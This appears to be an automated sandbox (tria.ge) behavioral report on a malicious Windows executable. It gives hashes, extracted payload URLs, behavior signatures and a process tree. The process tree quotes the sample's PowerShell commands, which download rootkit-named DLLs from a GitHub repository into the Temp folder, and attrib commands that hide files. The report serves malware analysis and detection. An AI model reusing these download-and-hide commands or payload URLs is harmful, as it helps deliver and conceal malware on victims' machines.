Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
26/12/2023, 12:39
Behavioral task
behavioral1
Sample
6f2bf69913f6bf47a6ae722c9640a311.exe
Resource
win7-20231215-en
General
-
Target
6f2bf69913f6bf47a6ae722c9640a311.exe
-
Size
46KB
-
MD5
6f2bf69913f6bf47a6ae722c9640a311
-
SHA1
5aa0c1acc2c56f283a9694f4953f6085f0b0059d
-
SHA256
8920797352a55d0413ab4642e7e2dcd049d702678f6870f6f58ac64e814e5720
-
SHA512
0721b0c5ad0ce0049609da9f59359fb5d895005342f87697683c9ffbb63213b125c8c81f55dfef50b7678b0f52ad3707d8c4cbdfadb64b8136f236bb3a30164c
-
SSDEEP
768:MB9QFE9xTu53yAeC1lNhTTHxAlbL0gUqrvs9kIL4:MBN9A5CAeCRpTHMbL0gU6+ka4
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC86.dll
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 2172 powershell.exe 4 2172 powershell.exe 5 2864 powershell.exe 6 2864 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2172 powershell.exe 2864 powershell.exe 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 1048 6f2bf69913f6bf47a6ae722c9640a311.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2172 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 1048 6f2bf69913f6bf47a6ae722c9640a311.exe Token: 33 1048 6f2bf69913f6bf47a6ae722c9640a311.exe Token: SeIncBasePriorityPrivilege 1048 6f2bf69913f6bf47a6ae722c9640a311.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1048 wrote to memory of 2740 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 28 PID 1048 wrote to memory of 2740 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 28 PID 1048 wrote to memory of 2740 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 28 PID 2740 wrote to memory of 2172 2740 cmd.exe 30 PID 2740 wrote to memory of 2172 2740 cmd.exe 30 PID 2740 wrote to memory of 2172 2740 cmd.exe 30 PID 1048 wrote to memory of 2836 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 31 PID 1048 wrote to memory of 2836 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 31 PID 1048 wrote to memory of 2836 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 31 PID 2836 wrote to memory of 2864 2836 cmd.exe 33 PID 2836 wrote to memory of 2864 2836 cmd.exe 33 PID 2836 wrote to memory of 2864 2836 cmd.exe 33 PID 1048 wrote to memory of 3004 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 34 PID 1048 wrote to memory of 3004 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 34 PID 1048 wrote to memory of 3004 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 34 PID 1048 wrote to memory of 2540 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 36 PID 1048 wrote to memory of 2540 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 36 PID 1048 wrote to memory of 2540 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 36 PID 1048 wrote to memory of 1016 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 39 PID 1048 wrote to memory of 1016 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 39 PID 1048 wrote to memory of 1016 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 39 PID 1048 wrote to memory of 1436 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 40 PID 1048 wrote to memory of 1436 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 40 PID 1048 wrote to memory of 1436 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 40 PID 1048 wrote to memory of 1600 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 42 PID 1048 wrote to memory of 1600 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 42 PID 1048 wrote to memory of 1600 1048 6f2bf69913f6bf47a6ae722c9640a311.exe 42 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 3004 attrib.exe 2540 attrib.exe 1016 attrib.exe 1436 attrib.exe 1600 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6f2bf69913f6bf47a6ae722c9640a311.exe"C:\Users\Admin\AppData\Local\Temp\6f2bf69913f6bf47a6ae722c9640a311.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\D64.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\Users\Admin\AppData\Local\Temp\r77-x64.dll');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\D86.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC86.dll','C:\Users\Admin\AppData\Local\Temp\r77-x86.dll');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\Subdir"2⤵
- Views/modifies file attributes
PID:3004
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\Subdir\$77-google.exe"2⤵
- Views/modifies file attributes
PID:2540
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Local\"2⤵
- Views/modifies file attributes
PID:1016
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\cjc3LXg4Ni5kbGw="2⤵
- Views/modifies file attributes
PID:1436
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\r77-x64.dll"2⤵
- Views/modifies file attributes
PID:1600
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD59c2599eecfb45356c99a7320805d85e7
SHA1ebbe61d1cf2d55c3d7c59fbaa1a2ba62b0f244e7
SHA256a3f1a82cc9957b71b5409c6280e97e8af14bdc3c6fb5ad195708f8c95a6f4d40
SHA512b8d32363da98d418f9caf853b1569a0b4051e2475067988f3cdbaf2226ba667d4dd1e69217e10860cb6a947b894093878a1fad6525aebb9c353e9e956a86c8a4
-
Filesize
222B
MD5d35427fb987daec1ccf0b500929c0bd0
SHA1f56c9b7e7ce037aa9cb3a513cb2d7ad317ab6447
SHA256f818bbd6afa5d80f4b2d8c2d090a2a487d3cd69ffd32214a169d62282b7cb861
SHA51273b489ab1372bc5cbf2248cf706041e73532daeebcf448d1720b485e7a5e7614afc9ebd6ea407adf3bd7006a61cef008241385bb1e060b3e4d33f8ca4b89f830
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a5a85c26f26618ec4ac4843fd2bb81cc
SHA1efc232d3aa24a286c335ea8812924cc66ed1130b
SHA256edf80f97ebe60d958b54c2889db0daaeb74941cafbf4b22b9c4fcc346aa6cad0
SHA51215150d54a2bd32d0ef7fda4a2492f323020652ae58b5632527618dc5bc798e3eee63d7862941f9b50bbcef49f478c11ad5d45ea30829c03188a778105263e3b8